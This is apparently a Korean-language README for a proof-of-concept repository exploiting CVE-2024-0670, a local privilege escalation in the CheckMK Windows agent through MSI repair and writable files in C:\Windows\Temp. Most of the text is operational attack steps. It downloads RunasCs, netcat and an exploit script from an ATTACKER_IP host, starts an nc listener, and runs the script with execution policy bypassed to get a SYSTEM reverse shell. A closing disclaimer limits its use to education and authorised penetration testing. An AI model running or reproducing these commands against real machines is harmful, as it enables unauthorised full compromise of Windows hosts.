
이 리포지토리에는 Windows용 CheckMK 에이전트에 영향을 미치는 로컬 권한 상승 취약점인 CVE-2024-0670에 대한 익스플로잇 데모가 포함되어 있습니다. 이 취약점을 통해 낮은 권한의 사용자가 MSI 복구 메커니즘에서 처리하는 쓰기 가능한 파일 경로를 악용하여 SYSTEM 권한을 획득할 수 있습니다.
이 저장소에는 CheckMK Windows 에이전트의 로컬 권한 상승 취약점인 CVE-2024-0670에 대한 간단하고 깔끔한 개념 증명(PoC)이 포함되어 있습니다. 낮은 권한의 사용자는 MSI 복구 중 실행되는 쓰기 가능한 임시 파일 경로를 악용하여 SYSTEM 권한을 얻을 수 있습니다.
MSI 복구 중 CheckMK는 다음 경로의 파일을 실행합니다:
C:\Windows\Temp\
일반 사용자가 예측 가능한 이름의 파일을 해당 위치에 배치할 수 있다면 NT AUTHORITY\SYSTEM 권한으로 명령을 실행할 수 있습니다.
이 익스플로잇은 여러 페이로드 파일 이름을 심고 MSI 복구를 트리거하여 SYSTEM 실행을 달성합니다.
RunasCs.exe → runas 대체 도구 (일반 텍스트 비밀번호 지원)
nc.exe → Netcat (리버스 셸)
exploit.ps1 → CVE-2024-0670 익스플로잇 스크립트
README.md → 문서
C:\Windows\Temp\
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1
사용자 머신에서 리스너를 시작합니다:
nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
성공하면 SYSTEM 역방향 셸을 받게 됩니다.
net4:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
net2:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs
이 프로젝트는 교육 및 공인된 침투 테스트 목적으로만 사용됩니다. 불법적인 목적으로 사용하지 마십시오. 저자는 오용에 대해 책임지지 않습니다.